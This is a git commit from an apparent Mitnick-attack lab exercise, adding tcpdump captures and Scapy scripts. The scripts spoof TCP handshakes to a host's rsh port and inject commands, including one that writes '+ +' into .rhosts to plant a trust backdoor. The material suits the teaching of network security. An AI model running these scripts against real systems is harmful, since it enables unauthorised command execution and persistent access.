tcp and mitnick lab finished

2026-05-08 21:21:45 +08:00
parent 31394e883b
commit d34f7f95dc
35 changed files with 22263 additions and 31 deletions
--- a/Mitnick/Labsetup/volumes/attack_capture.txt
+++ b/Mitnick/Labsetup/volumes/attack_capture.txt
@@ -0,0 +1,19 @@
+tcpdump: listening on br-63cae30f0395, link-type EN10MB (Ethernet), snapshot length 262144 bytes
+21:19:31.728151 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto TCP (6), length 40)
+    10.9.0.6.1023 > 10.9.0.5.514: Flags [S], cksum 0x0d19 (correct), seq 305419896, win 8192, length 0
+21:19:31.728207 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 44)
+    10.9.0.5.514 > 10.9.0.6.1023: Flags [S.], cksum 0x143b (incorrect -> 0xf29d), seq 4166791008, ack 305419897, win 64240, options [mss 1460], length 0
+21:19:31.728224 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
+    10.9.0.6.1023 > 10.9.0.5.514: Flags [R], cksum 0x2d16 (correct), seq 305419897, win 0, length 0
+21:19:31.737490 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto TCP (6), length 40)
+    10.9.0.6.1023 > 10.9.0.5.514: Flags [.], cksum 0xe54b (correct), seq 1, ack 1, win 8192, length 0
+21:19:31.737508 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
+    10.9.0.5.514 > 10.9.0.6.1023: Flags [R], cksum 0x6e05 (correct), seq 4166791009, win 0, length 0
+21:19:31.750513 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto TCP (6), length 85)
+    10.9.0.6.1023 > 10.9.0.5.514: Flags [P.], cksum 0x1577 (correct), seq 1:46, ack 1, win 8192, length 45
+21:19:31.750543 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
+    10.9.0.5.514 > 10.9.0.6.1023: Flags [R], cksum 0x6e05 (correct), seq 4166791009, win 0, length 0
+
+7 packets captured
+7 packets received by filter
+0 packets dropped by kernel
--- a/Mitnick/Labsetup/volumes/attack_v3.log
+++ b/Mitnick/Labsetup/volumes/attack_v3.log
@@ -0,0 +1,6 @@
+tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
+listening on br-63cae30f0395, link-type EN10MB (Ethernet), snapshot length 262144 bytes
+
+0 packets captured
+0 packets received by filter
+0 packets dropped by kernel
--- a/Mitnick/Labsetup/volumes/attack_v4.log
+++ b/Mitnick/Labsetup/volumes/attack_v4.log
@@ -0,0 +1,13 @@
+tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
+listening on br-63cae30f0395, link-type EN10MB (Ethernet), snapshot length 262144 bytes
+23:34:36.574238 IP 10.9.0.6.1023 > 10.9.0.5.514: Flags [S], seq 305419896, win 8192, length 0
+23:34:36.574367 IP 10.9.0.5.514 > 10.9.0.6.1023: Flags [S.], seq 1955993133, ack 305419897, win 64240, options [mss 1460], length 0
+23:34:36.574404 IP 10.9.0.6.1023 > 10.9.0.5.514: Flags [R], seq 305419897, win 0, length 0
+23:34:36.584589 IP 10.9.0.6.1023 > 10.9.0.5.514: Flags [.], ack 1, win 8192, length 0
+23:34:36.584644 IP 10.9.0.5.514 > 10.9.0.6.1023: Flags [R], seq 1955993134, win 0, length 0
+23:34:36.600097 IP 10.9.0.6.1023 > 10.9.0.5.514: Flags [P.], seq 1:46, ack 1, win 8192, length 45
+23:34:36.600187 IP 10.9.0.5.514 > 10.9.0.6.1023: Flags [R], seq 1955993134, win 0, length 0
+
+7 packets captured
+7 packets received by filter
+0 packets dropped by kernel
--- a/Mitnick/Labsetup/volumes/mitnick_all_in_one.py
+++ b/Mitnick/Labsetup/volumes/mitnick_all_in_one.py
@@ -0,0 +1,56 @@
+#!/usr/bin/python3
+from scapy.all import *
+
+X_IP = "10.9.0.5"
+SRV_IP = "10.9.0.6"
+X_PORT = 514
+SRV_PORT = 1023
+SECOND_PORT = 1022
+
+def attack():
+    my_seq = 0x12345678
+    
+    # Send SYN
+    print("Sending SYN...")
+    ip = IP(src=SRV_IP, dst=X_IP)
+    tcp = TCP(sport=SRV_PORT, dport=X_PORT, flags="S", seq=my_seq)
+    send(ip/tcp, verbose=0)
+    
+    def handle_pkt(pkt):
+        nonlocal my_seq
+        if pkt.haslayer(TCP):
+            # Handshake for first connection
+            if pkt[TCP].flags == "SA" and pkt[IP].src == X_IP and pkt[TCP].dport == SRV_PORT:
+                print(f"Received SYN+ACK for first connection (Seq: {pkt[TCP].seq})")
+                # Send ACK
+                ack_pkt = IP(src=SRV_IP, dst=X_IP) / \
+                          TCP(sport=SRV_PORT, dport=X_PORT, flags="A",
+                              seq=my_seq + 1, ack=pkt[TCP].seq + 1)
+                send(ack_pkt, verbose=0)
+                
+                # Send Data
+                data = f"{SECOND_PORT}\x00seed\x00seed\x00touch /tmp/success\x00"
+                data_pkt = IP(src=SRV_IP, dst=X_IP) / \
+                           TCP(sport=SRV_PORT, dport=X_PORT, flags="PA",
+                               seq=my_seq + 1, ack=pkt[TCP].seq + 1) / data
+                print("Sending Data...")
+                send(data_pkt, verbose=0)
+                
+            # Handshake for second connection
+            elif pkt[TCP].flags == "S" and pkt[IP].src == X_IP and pkt[TCP].dport == SECOND_PORT:
+                print(f"Received SYN for second connection (Seq: {pkt[TCP].seq})")
+                # Send SYN+ACK
+                srv_seq = 0x87654321
+                sa_pkt = IP(src=SRV_IP, dst=X_IP) / \
+                         TCP(sport=SECOND_PORT, dport=pkt[TCP].sport, flags="SA",
+                             seq=srv_seq, ack=pkt[TCP].seq + 1)
+                send(sa_pkt, verbose=0)
+                print("Sent SYN+ACK for second connection")
+                # We should also acknowledge the final ACK from X-Terminal if needed, 
+                # but rsh might proceed anyway.
+        return False
+
+    sniff(iface="br-63cae30f0395", filter=f"tcp and host {X_IP}", prn=handle_pkt, timeout=15)
+
+if __name__ == "__main__":
+    attack()
--- a/Mitnick/Labsetup/volumes/mitnick_final.py
+++ b/Mitnick/Labsetup/volumes/mitnick_final.py
@@ -0,0 +1,76 @@
+#!/usr/bin/python3
+from scapy.all import *
+import time
+import threading
+
+X_IP = "10.9.0.5"
+SRV_IP = "10.9.0.6"
+X_PORT = 514
+SRV_PORT = 1023
+SECOND_PORT = 1022
+IFACE = "br-63cae30f0395"
+
+def mitnick_attack():
+    my_seq = 0x12345678
+    
+    # State flags
+    handshake_done = False
+    second_conn_done = False
+
+    def handle_pkt(pkt):
+        nonlocal handshake_done, second_conn_done
+        if not pkt.haslayer(TCP):
+            return
+
+        # First Connection: SYN+ACK
+        if pkt[TCP].flags == "SA" and pkt[IP].src == X_IP and pkt[TCP].dport == SRV_PORT:
+            print(f"Received SYN+ACK. Seq: {pkt[TCP].seq}")
+            
+            # Send ACK
+            ack_pkt = IP(src=SRV_IP, dst=X_IP) / \
+                      TCP(sport=SRV_PORT, dport=X_PORT, flags="A",
+                          seq=my_seq + 1, ack=pkt[TCP].seq + 1)
+            send(ack_pkt, verbose=0, iface=IFACE)
+            print("Sent ACK")
+            
+            # Send RSH data
+            command = "echo + + > /home/seed/.rhosts"
+            data = f"{SECOND_PORT}\x00seed\x00seed\x00{command}\x00"
+            psh_pkt = IP(src=SRV_IP, dst=X_IP) / \
+                      TCP(sport=SRV_PORT, dport=X_PORT, flags="PA",
+                          seq=my_seq + 1, ack=pkt[TCP].seq + 1) / data
+            send(psh_pkt, verbose=0, iface=IFACE)
+            print(f"Sent RSH data: {command}")
+            handshake_done = True
+
+        # Second Connection: SYN
+        elif pkt[TCP].flags == "S" and pkt[IP].src == X_IP and pkt[TCP].dport == SECOND_PORT:
+            print(f"Received SYN for second connection. Seq: {pkt[TCP].seq}")
+            
+            # Send SYN+ACK
+            srv_seq2 = 0x99999999
+            sa_pkt = IP(src=SRV_IP, dst=X_IP) / \
+                     TCP(sport=SECOND_PORT, dport=pkt[TCP].sport, flags="SA",
+                         seq=srv_seq2, ack=pkt[TCP].seq + 1)
+            send(sa_pkt, verbose=0, iface=IFACE)
+            print("Sent SYN+ACK for second connection")
+            second_conn_done = True
+
+    # Start sniffer in a thread
+    print("Starting Sniffer...")
+    t = threading.Thread(target=lambda: sniff(iface=IFACE, filter=f"tcp and host {X_IP}", prn=handle_pkt, timeout=15))
+    t.start()
+    
+    time.sleep(1) # Give sniffer time to start
+    
+    # Step 1: Send spoofed SYN
+    print(f"Step 1: Sending spoofed SYN to {X_IP}:{X_PORT}")
+    ip = IP(src=SRV_IP, dst=X_IP)
+    tcp = TCP(sport=SRV_PORT, dport=X_PORT, flags="S", seq=my_seq)
+    send(ip/tcp, verbose=0, iface=IFACE)
+    
+    t.join()
+    print("Attack script finished.")
+
+if __name__ == "__main__":
+    mitnick_attack()
--- a/Mitnick/Labsetup/volumes/mitnick_task2_1.py
+++ b/Mitnick/Labsetup/volumes/mitnick_task2_1.py
@@ -0,0 +1,50 @@
+#!/usr/bin/python3
+from scapy.all import *
+import sys
+
+# IP Addresses
+X_IP = "10.9.0.5"
+SRV_IP = "10.9.0.6"
+
+# Ports
+X_PORT = 514
+SRV_PORT = 1023
+SECOND_PORT = 9090
+
+def mitnick_attack():
+    print(f"Starting Mitnick Attack on {X_IP}...")
+    
+    # Step 1: Send spoofed SYN packet to X-Terminal
+    my_seq = 0x12345678
+    ip = IP(src=SRV_IP, dst=X_IP)
+    tcp = TCP(sport=SRV_PORT, dport=X_PORT, flags="S", seq=my_seq)
+    print(f"Step 1: Sending spoofed SYN from {SRV_IP}:{SRV_PORT} to {X_IP}:{X_PORT}")
+    send(ip/tcp, verbose=0)
+
+    # Step 2 & 3: Sniff SYN+ACK and respond with ACK
+    def spoof_ack(pkt):
+        if pkt[TCP].flags == "SA" and pkt[IP].src == X_IP and pkt[TCP].dport == SRV_PORT:
+            print(f"Step 2: Received SYN+ACK from X-Terminal (Seq: {pkt[TCP].seq})")
+            
+            # Respond with ACK
+            ack_pkt = IP(src=SRV_IP, dst=X_IP) / \
+                      TCP(sport=SRV_PORT, dport=X_PORT, flags="A",
+                          seq=my_seq + 1, ack=pkt[TCP].seq + 1)
+            print("Step 3: Sending spoofed ACK to complete handshake")
+            send(ack_pkt, verbose=0)
+            
+            # Step 4: Send rsh data
+            data = f"{SECOND_PORT}\x00seed\x00seed\x00touch /tmp/backdoor_success\x00"
+            rsh_pkt = IP(src=SRV_IP, dst=X_IP) / \
+                      TCP(sport=SRV_PORT, dport=X_PORT, flags="PA",
+                          seq=my_seq + 1, ack=pkt[TCP].seq + 1) / data
+            print(f"Step 4: Sending rsh data: touch /tmp/backdoor_success")
+            send(rsh_pkt, verbose=0)
+            return True
+        return False
+
+    sniff(iface="br-63cae30f0395", filter=f"tcp and src host {X_IP} and dst port {SRV_PORT}", 
+          prn=spoof_ack, count=1, timeout=5)
+
+if __name__ == "__main__":
+    mitnick_attack()
--- a/Mitnick/Labsetup/volumes/mitnick_task2_2.py
+++ b/Mitnick/Labsetup/volumes/mitnick_task2_2.py
@@ -0,0 +1,25 @@
+#!/usr/bin/python3
+from scapy.all import *
+
+# IP Addresses
+X_IP = "10.9.0.5"
+SRV_IP = "10.9.0.6"
+
+# Ports
+SECOND_PORT = 9090
+
+def spoof_second_connection(pkt):
+    if pkt[TCP].flags == "S" and pkt[IP].dst == SRV_IP and pkt[TCP].dport == SECOND_PORT:
+        print(f"Received SYN for second connection from X-Terminal (Seq: {pkt[TCP].seq})")
+        
+        # Send SYN+ACK
+        my_seq = 0x87654321
+        ip = IP(src=SRV_IP, dst=X_IP)
+        tcp = TCP(sport=SECOND_PORT, dport=pkt[TCP].sport, flags="SA",
+                  seq=my_seq, ack=pkt[TCP].seq + 1)
+        print("Sending spoofed SYN+ACK for second connection")
+        send(ip/tcp, verbose=0)
+
+print(f"Waiting for second connection on port {SECOND_PORT}...")
+sniff(iface="br-63cae30f0395", filter=f"tcp and src host {X_IP} and dst port {SECOND_PORT}", 
+      prn=spoof_second_connection, count=1, timeout=20)
--- a/Mitnick/Labsetup/volumes/real_rsh.txt
+++ b/Mitnick/Labsetup/volumes/real_rsh.txt
--- a/Mitnick/Labsetup/volumes/real_rsh_v2.txt
+++ b/Mitnick/Labsetup/volumes/real_rsh_v2.txt
@@ -0,0 +1,99 @@
+tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
+listening on br-63cae30f0395, link-type EN10MB (Ethernet), snapshot length 262144 bytes
+17:23:25.401435 IP 10.9.0.6.1023 > 10.9.0.5.514: Flags [S], seq 1524240127, win 64240, options [mss 1460,sackOK,TS val 1969417712 ecr 0,nop,wscale 10], length 0
+	0x0000:  4500 003c 913b 4000 4006 9564 0a09 0006  E..<.;@.@..d....
+	0x0010:  0a09 0005 03ff 0202 5ada 0eff 0000 0000  ........Z.......
+	0x0020:  a002 faf0 144b 0000 0204 05b4 0402 080a  .....K..........
+	0x0030:  7562 edf0 0000 0000 0103 030a            ub..........
+17:23:25.401456 IP 10.9.0.5.514 > 10.9.0.6.1023: Flags [S.], seq 1861267738, ack 1524240128, win 65160, options [mss 1460,sackOK,TS val 430734879 ecr 1969417712,nop,wscale 10], length 0
+	0x0000:  4500 003c 0000 4000 4006 26a0 0a09 0005  E..<..@.@.&.....
+	0x0010:  0a09 0006 0202 03ff 6ef0 b11a 5ada 0f00  ........n...Z...
+	0x0020:  a012 fe88 144b 0000 0204 05b4 0402 080a  .....K..........
+	0x0030:  19ac 7e1f 7562 edf0 0103 030a            ..~.ub......
+17:23:25.401477 IP 10.9.0.6.1023 > 10.9.0.5.514: Flags [.], ack 1, win 63, options [nop,nop,TS val 1969417712 ecr 430734879], length 0
+	0x0000:  4500 0034 913c 4000 4006 956b 0a09 0006  E..4.<@.@..k....
+	0x0010:  0a09 0005 03ff 0202 5ada 0f00 6ef0 b11b  ........Z...n...
+	0x0020:  8010 003f 1443 0000 0101 080a 7562 edf0  ...?.C......ub..
+	0x0030:  19ac 7e1f                                ..~.
+17:23:25.401509 IP 10.9.0.6.1023 > 10.9.0.5.514: Flags [P.], seq 1:21, ack 1, win 63, options [nop,nop,TS val 1969417712 ecr 430734879], length 20
+	0x0000:  4500 0048 913d 4000 4006 9556 0a09 0006  E..H.=@.@..V....
+	0x0010:  0a09 0005 03ff 0202 5ada 0f00 6ef0 b11b  ........Z...n...
+	0x0020:  8018 003f 1457 0000 0101 080a 7562 edf0  ...?.W......ub..
+	0x0030:  19ac 7e1f 3130 3232 0073 6565 6400 7365  ..~.1022.seed.se
+	0x0040:  6564 0064 6174 6500                      ed.date.
+17:23:25.401512 IP 10.9.0.5.514 > 10.9.0.6.1023: Flags [.], ack 21, win 64, options [nop,nop,TS val 430734879 ecr 1969417712], length 0
+	0x0000:  4500 0034 e624 4000 4006 4083 0a09 0005  E..4.$@.@.@.....
+	0x0010:  0a09 0006 0202 03ff 6ef0 b11b 5ada 0f14  ........n...Z...
+	0x0020:  8010 0040 1443 0000 0101 080a 19ac 7e1f  ...@.C........~.
+	0x0030:  7562 edf0                                ub..
+17:23:25.403009 IP 10.9.0.5.1023 > 10.9.0.6.1022: Flags [S], seq 564203822, win 64240, options [mss 1460,sackOK,TS val 996775420 ecr 0,nop,wscale 10], length 0
+	0x0000:  4500 003c f2f4 4000 4006 33ab 0a09 0005  E..<..@.@.3.....
+	0x0010:  0a09 0006 03ff 03fe 21a1 112e 0000 0000  ........!.......
+	0x0020:  a002 faf0 144b 0000 0204 05b4 0402 080a  .....K..........
+	0x0030:  3b69 95fc 0000 0000 0103 030a            ;i..........
+17:23:25.403024 IP 10.9.0.6.1022 > 10.9.0.5.1023: Flags [S.], seq 3723508218, ack 564203823, win 65160, options [mss 1460,sackOK,TS val 1835098317 ecr 996775420,nop,wscale 10], length 0
+	0x0000:  4500 003c 0000 4000 4006 26a0 0a09 0006  E..<..@.@.&.....
+	0x0010:  0a09 0005 03fe 03ff ddf0 39fa 21a1 112f  ..........9.!../
+	0x0020:  a012 fe88 144b 0000 0204 05b4 0402 080a  .....K..........
+	0x0030:  6d61 60cd 3b69 95fc 0103 030a            ma`.;i......
+17:23:25.403039 IP 10.9.0.5.1023 > 10.9.0.6.1022: Flags [.], ack 1, win 63, options [nop,nop,TS val 996775420 ecr 1835098317], length 0
+	0x0000:  4500 0034 f2f5 4000 4006 33b2 0a09 0005  E..4..@.@.3.....
+	0x0010:  0a09 0006 03ff 03fe 21a1 112f ddf0 39fb  ........!../..9.
+	0x0020:  8010 003f 1443 0000 0101 080a 3b69 95fc  ...?.C......;i..
+	0x0030:  6d61 60cd                                ma`.
+17:23:25.403906 IP 10.9.0.5.514 > 10.9.0.6.1023: Flags [P.], seq 1:2, ack 21, win 64, options [nop,nop,TS val 430734882 ecr 1969417712], length 1
+	0x0000:  4500 0035 e625 4000 4006 4081 0a09 0005  E..5.%@.@.@.....
+	0x0010:  0a09 0006 0202 03ff 6ef0 b11b 5ada 0f14  ........n...Z...
+	0x0020:  8018 0040 1444 0000 0101 080a 19ac 7e22  ...@.D........~"
+	0x0030:  7562 edf0 00                             ub...
+17:23:25.403917 IP 10.9.0.6.1023 > 10.9.0.5.514: Flags [.], ack 2, win 63, options [nop,nop,TS val 1969417715 ecr 430734882], length 0
+	0x0000:  4500 0034 913e 4000 4006 9569 0a09 0006  E..4.>@.@..i....
+	0x0010:  0a09 0005 03ff 0202 5ada 0f14 6ef0 b11c  ........Z...n...
+	0x0020:  8010 003f 1443 0000 0101 080a 7562 edf3  ...?.C......ub..
+	0x0030:  19ac 7e22                                ..~"
+17:23:25.403935 IP 10.9.0.6.1023 > 10.9.0.5.514: Flags [F.], seq 21, ack 2, win 63, options [nop,nop,TS val 1969417715 ecr 430734882], length 0
+	0x0000:  4500 0034 913f 4000 4006 9568 0a09 0006  E..4.?@.@..h....
+	0x0010:  0a09 0005 03ff 0202 5ada 0f14 6ef0 b11c  ........Z...n...
+	0x0020:  8011 003f 1443 0000 0101 080a 7562 edf3  ...?.C......ub..
+	0x0030:  19ac 7e22                                ..~"
+17:23:25.405395 IP 10.9.0.5.514 > 10.9.0.6.1023: Flags [P.], seq 2:31, ack 22, win 64, options [nop,nop,TS val 430734883 ecr 1969417715], length 29
+	0x0000:  4500 0051 e626 4000 4006 4064 0a09 0005  E..Q.&@.@.@d....
+	0x0010:  0a09 0006 0202 03ff 6ef0 b11c 5ada 0f15  ........n...Z...
+	0x0020:  8018 0040 1460 0000 0101 080a 19ac 7e23  ...@.`........~#
+	0x0030:  7562 edf3 4d6f 6e20 4d61 7920 2034 2030  ub..Mon.May..4.0
+	0x0040:  393a 3233 3a32 3520 5554 4320 3230 3236  9:23:25.UTC.2026
+	0x0050:  0a                                       .
+17:23:25.405404 IP 10.9.0.6.1023 > 10.9.0.5.514: Flags [.], ack 31, win 63, options [nop,nop,TS val 1969417716 ecr 430734883], length 0
+	0x0000:  4500 0034 9140 4000 4006 9567 0a09 0006  E..4.@@.@..g....
+	0x0010:  0a09 0005 03ff 0202 5ada 0f15 6ef0 b139  ........Z...n..9
+	0x0020:  8010 003f 1443 0000 0101 080a 7562 edf4  ...?.C......ub..
+	0x0030:  19ac 7e23                                ..~#
+17:23:25.405411 IP 10.9.0.5.1023 > 10.9.0.6.1022: Flags [F.], seq 1, ack 1, win 63, options [nop,nop,TS val 996775422 ecr 1835098317], length 0
+	0x0000:  4500 0034 f2f6 4000 4006 33b1 0a09 0005  E..4..@.@.3.....
+	0x0010:  0a09 0006 03ff 03fe 21a1 112f ddf0 39fb  ........!../..9.
+	0x0020:  8011 003f 1443 0000 0101 080a 3b69 95fe  ...?.C......;i..
+	0x0030:  6d61 60cd                                ma`.
+17:23:25.405447 IP 10.9.0.5.514 > 10.9.0.6.1023: Flags [F.], seq 31, ack 22, win 64, options [nop,nop,TS val 430734883 ecr 1969417716], length 0
+	0x0000:  4500 0034 e627 4000 4006 4080 0a09 0005  E..4.'@.@.@.....
+	0x0010:  0a09 0006 0202 03ff 6ef0 b139 5ada 0f15  ........n..9Z...
+	0x0020:  8011 0040 1443 0000 0101 080a 19ac 7e23  ...@.C........~#
+	0x0030:  7562 edf4                                ub..
+17:23:25.405454 IP 10.9.0.6.1023 > 10.9.0.5.514: Flags [.], ack 32, win 63, options [nop,nop,TS val 1969417716 ecr 430734883], length 0
+	0x0000:  4500 0034 9141 4000 4006 9566 0a09 0006  E..4.A@.@..f....
+	0x0010:  0a09 0005 03ff 0202 5ada 0f15 6ef0 b13a  ........Z...n..:
+	0x0020:  8010 003f 1443 0000 0101 080a 7562 edf4  ...?.C......ub..
+	0x0030:  19ac 7e23                                ..~#
+17:23:25.405468 IP 10.9.0.6.1022 > 10.9.0.5.1023: Flags [F.], seq 1, ack 2, win 64, options [nop,nop,TS val 1835098319 ecr 996775422], length 0
+	0x0000:  4500 0034 7955 4000 4006 ad52 0a09 0006  E..4yU@.@..R....
+	0x0010:  0a09 0005 03fe 03ff ddf0 39fb 21a1 1130  ..........9.!..0
+	0x0020:  8011 0040 1443 0000 0101 080a 6d61 60cf  ...@.C......ma`.
+	0x0030:  3b69 95fe                                ;i..
+17:23:25.405479 IP 10.9.0.5.1023 > 10.9.0.6.1022: Flags [.], ack 2, win 63, options [nop,nop,TS val 996775422 ecr 1835098319], length 0
+	0x0000:  4500 0034 f2f7 4000 4006 33b0 0a09 0005  E..4..@.@.3.....
+	0x0010:  0a09 0006 03ff 03fe 21a1 1130 ddf0 39fc  ........!..0..9.
+	0x0020:  8010 003f 1443 0000 0101 080a 3b69 95fe  ...?.C......;i..
+	0x0030:  6d61 60cf                                ma`.
+
+18 packets captured
+18 packets received by filter
+0 packets dropped by kernel
--- a/Mitnick/Labsetup/volumes/spoofer_v3.log
+++ b/Mitnick/Labsetup/volumes/spoofer_v3.log